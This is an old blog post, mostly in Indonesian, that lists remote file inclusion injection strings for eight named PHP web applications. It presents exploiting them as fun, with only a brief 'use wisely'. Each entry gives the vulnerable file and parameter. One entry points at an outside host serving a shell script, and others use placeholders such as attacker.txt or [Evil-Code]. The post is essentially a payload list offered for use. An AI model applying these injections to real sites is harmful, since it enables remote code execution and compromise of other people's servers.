My Opinion

Latest Remote File Include Vulnerability

By brokencode ⋅ January 22, 2007 ⋅  Email This Post ⋅  Print This Post ⋅ Post a comment

Mengexploitasi vulner RFI pada sebuah situs memang mengasyikan (bagi sebagian orang) dan user friendly :)
Check these out (Gunakan dengan bijak!) :

PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability
Injection : / [Comment IT_path] /mep/frame.php?chem=http://turnkringonzehoop.be/viper.txt?

Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability
Injection : /frontpage.php?setup_folder=shell.txt?

ComVironment 4.0 (grab_globals.lib.php) Remote File Include Vulnerability
Injection : /libraries/grab_globals.lib.php?inc_dir=[Evil-Code]

Poplar Gedcom Viewer <= 2.0 (common.php) Remote Inclusion Vuln
Injection : /include/common.php?env[rootPath]=[EV!L-CODE]

TLM CMS <= 1.1 (i-accueil.php chemin) Remote File Include Vulnerability
Injection : /i-accueil.php?chemin=EV!L.C0D3.Txt

LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability
Exploit: show.php?PollDir=http://attacker.txt?

Magic Photo Storage Website _config[site_path] File Include Vuln
exploit; /include/common_function.php?_config[site_path]=http://shell
Note : Bravo k1tk4t !!! :P

AllMyGuests 3.0 Remote File Inclusion Vulnerability
Injection : /[AllMyGuests_Path]/comments.php?AMG_serverpath=[evil_script]

Penyebab RFI dan atau LFI pernah saya tulis disini

Tags: Hacking